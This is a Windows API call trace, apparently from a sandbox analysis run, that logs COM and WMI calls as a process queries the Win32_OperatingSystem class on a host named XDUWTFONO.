	[0220.652] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8b0 | out: ppvObject=0x1c80c8b0*=0x0) returned 0x80004002
	[0220.654] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c648 | out: ppvObject=0x1c80c648*=0x0) returned 0x80004002
	[0220.655] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x3
	[0220.655] CoGetContextToken (in: pToken=0x1c80c500 | out: pToken=0x1c80c500) returned 0x0
	[0220.655] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c0 | out: ppvObject=0x1c80c4c0*=0x1b808018) returned 0x0
	[0220.655] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b808018, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c4f0 | out: pCid=0x1c80c4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.655] WbemLocator:IUnknown:Release (This=0x1b808018) returned 0x3
	[0220.656] CoGetContextToken (in: pToken=0x1c80c4d0 | out: pToken=0x1c80c4d0) returned 0x0
	[0220.656] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x4
	[0220.656] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c5e8 | out: ppvObject=0x1c80c5e8*=0x1b808100) returned 0x0
	[0220.656] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x4
	[0220.656] WbemLocator:IRpcOptions:Query (in: This=0x1b808100, pPrx=0x1b808130, dwProperty=2, pdwValue=0x1c80c658 | out: pdwValue=0x1c80c658) returned 0x80004002
	[0220.656] WbemLocator:IUnknown:Release (This=0x1b808100) returned 0x3
	[0220.656] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x2
	[0220.657] CoGetContextToken (in: pToken=0x1c80c9d0 | out: pToken=0x1c80c9d0) returned 0x0
	[0220.657] CoGetContextToken (in: pToken=0x1c80c910 | out: pToken=0x1c80c910) returned 0x0
	[0220.657] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x3
	[0220.657] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x1c80ca50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ca30 | out: ppvObject=0x1c80ca30*=0x1c83c728) returned 0x0
	[0220.657] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x3
	[0220.657] IUnknown:Release (This=0x1c83c728) returned 0x2
	[0220.657] IUnknown:Release (This=0x1c83c728) returned 0x1
	[0220.657] WbemLocator:IUnknown:Release (This=0x1c83b2b8) returned 0x2
	[0220.658] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80cff0 | out: puCount=0x1c80cff0*=0x2) returned 0x0
	[0220.658] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80cff0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cff0*=0x17, pszText=0x0) returned 0x0
	[0220.658] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80cff0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cff0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.658] CoGetContextToken (in: pToken=0x1c80cbf0 | out: pToken=0x1c80cbf0) returned 0x0
	[0220.658] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0220.658] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x2
	[0220.658] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x1c80cc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cc50 | out: ppvObject=0x1c80cc50*=0x1c83c728) returned 0x0
	[0220.658] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x2
	[0220.658] IUnknown:AddRef (This=0x1c83c728) returned 0x3
	[0220.658] IEnumWbemClassObject:Clone (in: This=0x1c83c728, ppEnum=0x1c80d0b0 | out: ppEnum=0x1c80d0b0*=0x1c8381d8) returned 0x0
	[0220.664] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cd08 | out: ppvObject=0x1c80cd08*=0x1c8381e0) returned 0x0
	[0220.664] IClientSecurity:QueryBlanket (in: This=0x1c8381e0, pProxy=0x1c8381d8, pAuthnSvc=0x1c80cd00, pAuthzSvc=0x1c80ccfc, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8, pImpLevel=0x1c80cd14, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10 | out: pAuthnSvc=0x1c80cd00*=0xa, pAuthzSvc=0x1c80ccfc*=0x0, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8*=0x6, pImpLevel=0x1c80cd14*=0x2, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10*=0x1) returned 0x0
	[0220.664] IUnknown:Release (This=0x1c8381e0) returned 0x1
	[0220.664] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cca8 | out: ppvObject=0x1c80cca8*=0x1b807fb0) returned 0x0
	[0220.664] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc38 | out: ppvObject=0x1c80cc38*=0x1c8381e0) returned 0x0
	[0220.664] IClientSecurity:SetBlanket (This=0x1c8381e0, pProxy=0x1c8381d8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.668] IUnknown:Release (This=0x1c8381e0) returned 0x2
	[0220.668] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x1
	[0220.668] CoTaskMemFree (pv=0x1b81e4a0) 
	[0220.669] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c8d0 | out: ppvObject=0x1c80c8d0*=0x1b807fb0) returned 0x0
	[0220.669] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c950 | out: ppvObject=0x1c80c950*=0x0) returned 0x80004002
	[0220.671] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c6e8 | out: ppvObject=0x1c80c6e8*=0x0) returned 0x80004002
	[0220.672] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x3
	[0220.672] CoGetContextToken (in: pToken=0x1c80c5a0 | out: pToken=0x1c80c5a0) returned 0x0
	[0220.672] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c560 | out: ppvObject=0x1c80c560*=0x1b807e98) returned 0x0
	[0220.672] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807e98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c590 | out: pCid=0x1c80c590*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.672] WbemLocator:IUnknown:Release (This=0x1b807e98) returned 0x3
	[0220.673] CoGetContextToken (in: pToken=0x1c80c570 | out: pToken=0x1c80c570) returned 0x0
	[0220.673] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x4
	[0220.673] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c688 | out: ppvObject=0x1c80c688*=0x1b807f80) returned 0x0
	[0220.673] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x4
	[0220.673] WbemLocator:IRpcOptions:Query (in: This=0x1b807f80, pPrx=0x1b807fb0, dwProperty=2, pdwValue=0x1c80c6f8 | out: pdwValue=0x1c80c6f8) returned 0x80004002
	[0220.673] WbemLocator:IUnknown:Release (This=0x1b807f80) returned 0x3
	[0220.673] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x2
	[0220.673] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0220.674] CoGetContextToken (in: pToken=0x1c80c9b0 | out: pToken=0x1c80c9b0) returned 0x0
	[0220.674] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x3
	[0220.674] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x1c80caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cad0 | out: ppvObject=0x1c80cad0*=0x1c8381d8) returned 0x0
	[0220.674] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x3
	[0220.674] IUnknown:Release (This=0x1c8381d8) returned 0x2
	[0220.674] IUnknown:Release (This=0x1c8381d8) returned 0x1
	[0220.674] IUnknown:Release (This=0x1c83c728) returned 0x2
	[0220.674] CoGetContextToken (in: pToken=0x1c80ce70 | out: pToken=0x1c80ce70) returned 0x0
	[0220.674] CoGetContextToken (in: pToken=0x1c80cdb0 | out: pToken=0x1c80cdb0) returned 0x0
	[0220.675] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x2
	[0220.675] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x1c80cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ced0 | out: ppvObject=0x1c80ced0*=0x1c8381d8) returned 0x0
	[0220.675] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x2
	[0220.675] IUnknown:AddRef (This=0x1c8381d8) returned 0x3
	[0220.675] IEnumWbemClassObject:Reset (This=0x1c8381d8) returned 0x0
	[0220.681] IUnknown:Release (This=0x1c8381d8) returned 0x2
	[0220.681] CoTaskMemAlloc (cb=0x8) returned 0x1b8300a0
	[0220.681] IEnumWbemClassObject:Next (in: This=0x1c8381d8, lTimeout=-1, uCount=0x1, apObjects=0x1b8300a0, puReturned=0x1c80d0f8 | out: apObjects=0x1b8300a0*=0x1c83e8d0, puReturned=0x1c80d0f8*=0x1) returned 0x0
	[0220.684] IUnknown:QueryInterface (in: This=0x1c83e8d0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c420 | out: ppvObject=0x1c80c420*=0x1c83e8d0) returned 0x0
	[0220.685] IUnknown:QueryInterface (in: This=0x1c83e8d0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c4a0 | out: ppvObject=0x1c80c4a0*=0x0) returned 0x80004002
	[0220.685] IUnknown:QueryInterface (in: This=0x1c83e8d0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c238 | out: ppvObject=0x1c80c238*=0x0) returned 0x80004002
	[0220.685] IUnknown:AddRef (This=0x1c83e8d0) returned 0x3
	[0220.686] CoGetContextToken (in: pToken=0x1c80c0f0 | out: pToken=0x1c80c0f0) returned 0x0
	[0220.686] IUnknown:QueryInterface (in: This=0x1c83e8d0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c0b0 | out: ppvObject=0x1c80c0b0*=0x1c83e8d8) returned 0x0
	[0220.686] IMarshal:GetUnmarshalClass (in: This=0x1c83e8d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c0e0 | out: pCid=0x1c80c0e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0220.686] IUnknown:Release (This=0x1c83e8d8) returned 0x3
	[0220.686] CoGetContextToken (in: pToken=0x1c80c0c0 | out: pToken=0x1c80c0c0) returned 0x0
	[0220.686] IUnknown:AddRef (This=0x1c83e8d0) returned 0x4
	[0220.686] IUnknown:QueryInterface (in: This=0x1c83e8d0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c1d8 | out: ppvObject=0x1c80c1d8*=0x0) returned 0x80004002
	[0220.686] IUnknown:Release (This=0x1c83e8d0) returned 0x3
	[0220.687] IUnknown:Release (This=0x1c83e8d0) returned 0x2
	[0220.687] CoGetContextToken (in: pToken=0x1c80c580 | out: pToken=0x1c80c580) returned 0x0
	[0220.687] CoGetContextToken (in: pToken=0x1c80c4c0 | out: pToken=0x1c80c4c0) returned 0x0
	[0220.687] IUnknown:AddRef (This=0x1c83e8d0) returned 0x3
	[0220.687] IUnknown:QueryInterface (in: This=0x1c83e8d0, riid=0x1c80c600*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80c5e0 | out: ppvObject=0x1c80c5e0*=0x1c83e8d0) returned 0x0
	[0220.687] IUnknown:Release (This=0x1c83e8d0) returned 0x3
	[0220.687] IUnknown:Release (This=0x1c83e8d0) returned 0x2
	[0220.687] IUnknown:Release (This=0x1c83e8d0) returned 0x1
	[0220.687] CoTaskMemFree (pv=0x1b8300a0) 
	[0220.688] CoGetContextToken (in: pToken=0x1c80cf00 | out: pToken=0x1c80cf00) returned 0x0
	[0220.688] IUnknown:AddRef (This=0x1c83e8d0) returned 0x2
	[0220.688] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__GENUS", lFlags=0, pVal=0x1c80d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d06c*=0, plFlavor=0x1c80d068*=0 | out: pVal=0x1c80d070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d06c*=3, plFlavor=0x1c80d068*=64) returned 0x0
	[0220.688] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__PATH", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d00c*=8, plFlavor=0x1c80d008*=64) returned 0x0
	[0220.688] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x3f
	[0220.688] CoGetObjectContext (in: riid=0x1c80cfa8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfa0 | out: ppv=0x1c80cfa0*=0x181868) returned 0x0
	[0220.688] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfc0 | out: pAptType=0x1c80cfc0*=1) returned 0x0
	[0220.688] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0c8 | out: ppvObject=0x1c80d0c8*=0x0) returned 0x80004002
	[0220.689] IUnknown:Release (This=0x181868) returned 0x1
	[0220.689] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c630 | out: ppv=0x1c80c630*=0x1c83e160) returned 0x0
	[0220.689] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83e160, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c340 | out: ppvObject=0x1c80c340*=0x0) returned 0x80004002
	[0220.690] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c83e160, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c328 | out: ppvObject=0x1c80c328*=0x1c840820) returned 0x0
	[0220.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c840820, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c230 | out: ppvObject=0x1c80c230*=0x1c840820) returned 0x0
	[0220.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c840820, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c2b0 | out: ppvObject=0x1c80c2b0*=0x0) returned 0x80004002
	[0220.690] WbemDefPath:IUnknown:AddRef (This=0x1c840820) returned 0x3
	[0220.690] CoGetContextToken (in: pToken=0x1c80bf00 | out: pToken=0x1c80bf00) returned 0x0
	[0220.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c840820, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bec0 | out: ppvObject=0x1c80bec0*=0x1b82c440) returned 0x0
	[0220.691] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b82c440, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bef0 | out: pCid=0x1c80bef0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.691] WbemDefPath:IUnknown:Release (This=0x1b82c440) returned 0x3
	[0220.691] CoGetContextToken (in: pToken=0x1c80bed0 | out: pToken=0x1c80bed0) returned 0x0
	[0220.691] WbemDefPath:IUnknown:AddRef (This=0x1c840820) returned 0x4
	[0220.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c840820, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bfe8 | out: ppvObject=0x1c80bfe8*=0x0) returned 0x80004002
	[0220.691] WbemDefPath:IUnknown:Release (This=0x1c840820) returned 0x3
	[0220.691] WbemDefPath:IUnknown:Release (This=0x1c840820) returned 0x2
	[0220.692] WbemDefPath:IUnknown:Release (This=0x1c83e160) returned 0x0
	[0220.692] WbemDefPath:IUnknown:Release (This=0x1c840820) returned 0x1
	[0220.692] CoGetContextToken (in: pToken=0x1c80cc00 | out: pToken=0x1c80cc00) returned 0x0
	[0220.692] CoGetContextToken (in: pToken=0x1c80cb40 | out: pToken=0x1c80cb40) returned 0x0
	[0220.692] WbemDefPath:IUnknown:AddRef (This=0x1c840820) returned 0x2
	[0220.692] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c840820, riid=0x1c80cc80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cc60 | out: ppvObject=0x1c80cc60*=0x1c840820) returned 0x0
	[0220.692] WbemDefPath:IUnknown:Release (This=0x1c840820) returned 0x2
	[0220.692] WbemDefPath:IUnknown:Release (This=0x1c840820) returned 0x1
	[0220.693] CoGetContextToken (in: pToken=0x1c80cd80 | out: pToken=0x1c80cd80) returned 0x0
	[0220.693] CoGetContextToken (in: pToken=0x1c80ccc0 | out: pToken=0x1c80ccc0) returned 0x0
	[0220.693] WbemDefPath:IUnknown:AddRef (This=0x1c840820) returned 0x2
	[0220.693] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c840820, riid=0x1c80ce00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cde0 | out: ppvObject=0x1c80cde0*=0x1c840820) returned 0x0
	[0220.693] WbemDefPath:IUnknown:Release (This=0x1c840820) returned 0x2
	[0220.693] WbemDefPath:IUnknown:AddRef (This=0x1c840820) returned 0x3
	[0220.693] WbemDefPath:IWbemPath:SetText (This=0x1c840820, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x0
	[0220.693] WbemDefPath:IUnknown:Release (This=0x1c840820) returned 0x2
	[0220.693] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80d040 | out: puCount=0x1c80d040*=0x2) returned 0x0
	[0220.693] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d040*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d040*=0x17, pszText=0x0) returned 0x0
	[0220.693] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d040*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d040*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.693] CoTaskMemAlloc (cb=0x8) returned 0x1b8300a0
	[0220.694] IEnumWbemClassObject:Next (in: This=0x1c8381d8, lTimeout=-1, uCount=0x1, apObjects=0x1b8300a0, puReturned=0x1c80d0f8 | out: apObjects=0x1b8300a0*=0x0, puReturned=0x1c80d0f8*=0x0) returned 0x1
	[0220.706] CoTaskMemFree (pv=0x1b8300a0) 
	[0220.706] CoGetContextToken (in: pToken=0x1c80ce80 | out: pToken=0x1c80ce80) returned 0x0
	[0220.706] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x1
	[0220.706] IUnknown:Release (This=0x1c8381d8) returned 0x0
	[0220.971] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80d000 | out: puCount=0x1c80d000*=0x2) returned 0x0
	[0220.971] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d000*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d000*=0x17, pszText=0x0) returned 0x0
	[0220.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d000*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d000*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.972] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80cff0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cfec*=0, plFlavor=0x1c80cfe8*=0 | out: pVal=0x1c80cff0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80cfec*=8, plFlavor=0x1c80cfe8*=64) returned 0x0
	[0220.972] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
